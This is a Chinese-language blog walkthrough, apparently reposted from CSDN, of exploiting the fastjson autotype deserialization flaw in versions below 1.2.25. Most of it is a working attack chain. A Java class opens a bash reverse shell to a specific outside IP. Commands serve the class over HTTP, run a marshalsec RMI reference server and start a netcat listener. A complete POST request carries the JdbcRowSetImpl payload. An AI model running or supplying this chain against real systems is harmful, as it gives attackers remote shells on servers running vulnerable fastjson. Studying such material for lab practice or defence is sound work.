目录
编译test.java(命令:javac test.java)
本地服务监听8002端口(8002为test.java中修改的端口)
实验原理
fastjson autotype在处理json对象的时候没有对@type字段进行安全性验证,导致攻击者传入危险类,并调用危险类连接远程主机,通过恶意类执行代码
影响版本
fastjson<1.2.25
下载工具
git clone https: //github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests
安装完切换到target目录下新建test.java
(命令:vim test.java-粘贴代码-更改反弹shell的地址和端口)
import java.lang.Runtime;
import java.lang.Process;
public class test {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/124.223.63.91/8002 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
编译test.java(命令:javac test.java)
开启一个http服务,方便加载test.class
python2: python2 -m SimpleHTTPServer
python3: python3 -m http.server
访问124.223.63.91:8000
启动rmi服务监听9999端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://124.223.63.91:8000/#test" 9999
(8000为上一步开启http服务的端口)
本地服务监听8002端口(8002为test.java中修改的端口)
命令:nc -nvlp 8002
构造请求包
POST / HTTP/1.1
Host: 172.16.181.6:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type:application/json;charset=UTF-8
Upgrade-Insecure-Requests: 1
Content-Length: 157
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://124.223.63.91:9999/Test",
"autoCommit":true
}
}
查看端口
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125360498